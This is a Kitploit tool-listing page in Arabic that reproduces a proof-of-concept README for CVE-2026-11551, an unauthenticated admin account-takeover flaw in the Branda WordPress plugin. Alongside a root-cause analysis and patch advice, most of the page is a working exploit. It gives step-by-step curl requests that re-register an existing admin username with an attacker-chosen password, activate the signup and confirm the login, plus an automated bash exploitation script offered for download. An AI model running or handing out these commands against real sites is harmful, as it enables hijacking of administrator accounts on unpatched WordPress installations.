Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Unauthenticated Privilege Escalation via Account Takeover

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-11551: إضافة Branda - تصعيد امتيازات بدون مصادقة عبر الاستيلاء على الحساب

نظرة عامة

  • معرف CVE: CVE-2026-11551
  • درجة CVSS: 9.8 (حرجة)
  • المتأثر: Branda – White Label & Branding <= 3.4.29
  • تم التصحيح: 3.4.31
  • تاريخ النشر: 19 يونيو 2026

وصف الثغرة

إضافة Branda الخاصة بـ WordPress معرّضة لتصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 3.4.29 وما يشملها. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل تحديث كلمة المرور الخاصة به. وهذا يتيح للمهاجمين غير المصادق عليهم تغيير كلمات مرور أي مستخدمين، بما في ذلك المسؤولين، واستغلال ذلك للوصول إلى حساباتهم.

التحليل الفني

موقع الكود الثغري

/inc/modules/login-screen/signup-password.php

السبب الجذري

تفتقر الدالة pre_insert_user_data() في الإصدار الثغري إلى التحقق السليم:

root@kitploit:~
// Vulnerable version (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code...
    }
    // Missing: if ($update) return $data; <-- VULNERABILITY
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Set the password from POST data
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

الكود المُصحَّح (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code with proper checks...
    }

    // FIX: Added check to prevent updating existing users
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

نواقل الهجوم

المتجه 1: تسجيل Multisite (رئيسي)

  1. يصل المهاجم إلى /wp-signup.php
  2. يسجّل باستخدام اسم مستخدم مسؤول موجود (مثل "admin")
  3. يعيّن كلمة مرور مخصصة عبر معامل password_1
  4. تخزّن Branda كلمة المرور في البيانات الوصفية للتسجيل (signup meta)
  5. عند التفعيل، تستبدل كلمة المرور كلمة مرور المسؤول الحالي

المتجه 2: تسجيل موقع فردي

  1. يصل المهاجم إلى /wp-login.php?action=register
  2. تضيف Branda حقول كلمة المرور إلى النموذج
  3. يرسل المهاجم طلب التسجيل باسم مستخدم موجود
  4. إذا اكتمل التفعيل، يتم تعيين كلمة المرور

إثبات المفهوم (curl)

الخطوة 1: التحقق مما إذا كان التسجيل مفعلاً

root@kitploit:~
curl -s -k "https://TARGET/wp-login.php?action=register" | grep -i "registration"

الخطوة 2: تحديد نوع WordPress (Multisite أم فردي)

root@kitploit:~
curl -s -k -I "https://TARGET/wp-signup.php" | grep "HTTP/"

الخطوة 3: لـ Multisite - التسجيل باسم مستخدم مسؤول

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

الخطوة 4: لموقع فردي - التسجيل

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

الخطوة 5: التفعيل (إذا كان التحقق عبر البريد الإلكتروني مطلوباً)

root@kitploit:~
# Extract activation key from email and visit:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://TARGET/wp-activate.php?key=ACTIVATION_KEY"

الخطوة 6: التحقق - محاولة تسجيل الدخول

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

سكربت الاستغلال الآلي

root@kitploit:~
#!/bin/bash
TARGET="https://TARGET"
USERNAME="admin"
NEW_PASSWORD="Pwned$(date +%s)!"

echo "[*] Registering $USERNAME with password $NEW_PASSWORD..."

# Multisite attack
curl -s -k -c /tmp/cookies.txt \
  -X POST "$TARGET/wp-signup.php" \
  -d "user_name=$USERNAME" \
  -d "[email protected]" \
  -d "password_1=$NEW_PASSWORD" \
  -d "password_2=$NEW_PASSWORD"

echo "[*] Check email for activation link"
echo "[*] After activation, try: curl -X POST $TARGET/wp-login.php -d 'log=$USERNAME' -d 'pwd=$NEW_PASSWORD'"

متطلبات الاستغلال

  1. تثبيت وتفعيل WordPress بإضافة Branda <= 3.4.29
  2. يجب تفعيل تسجيل المستخدمين (تحقق من الإعدادات > عام > العضوية: يمكن لأي شخص التسجيل)
  3. للاستيلاء الناجح على الحساب: يجب أن يكون اسم المستخدم الهدف موجوداً
  4. بالنسبة لـ Multisite: الوصول إلى بريد التفعيل (أو تجاوز التفعيل)

المعالجة

قم بتحديث إضافة Branda إلى الإصدار 3.4.31 أو أحدث:

root@kitploit:~
# Via WordPress Admin
Dashboard > Plugins > Branda > Update

# Via WP-CLI
wp plugin update branda-white-labeling

# Via SSH
wp plugin update branda-white-labeling --version=3.4.31

التأثير

  • السرية: عالية - يحصل المهاجم على حق الوصول إلى أي حساب مستخدم
  • النزاهة: عالية - يمكن للمهاجم تعديل المحتوى
  • التوفر: عالية - يمكن للمهاجم منع المستخدمين الشرعيين من الدخول

المراجع

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • قناة W.P.E.F على تيليغرام #1
  • قناة W.P.E.F على تيليغرام #2
تنزيل الأداة